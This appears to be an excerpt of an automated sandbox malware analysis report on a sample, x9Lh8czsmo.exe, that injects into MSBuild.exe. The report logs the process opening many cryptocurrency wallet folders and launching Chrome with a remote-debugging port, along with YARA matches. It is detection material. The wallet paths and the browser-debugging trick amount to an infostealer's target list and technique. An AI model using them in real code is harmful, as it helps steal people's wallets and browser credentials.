Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR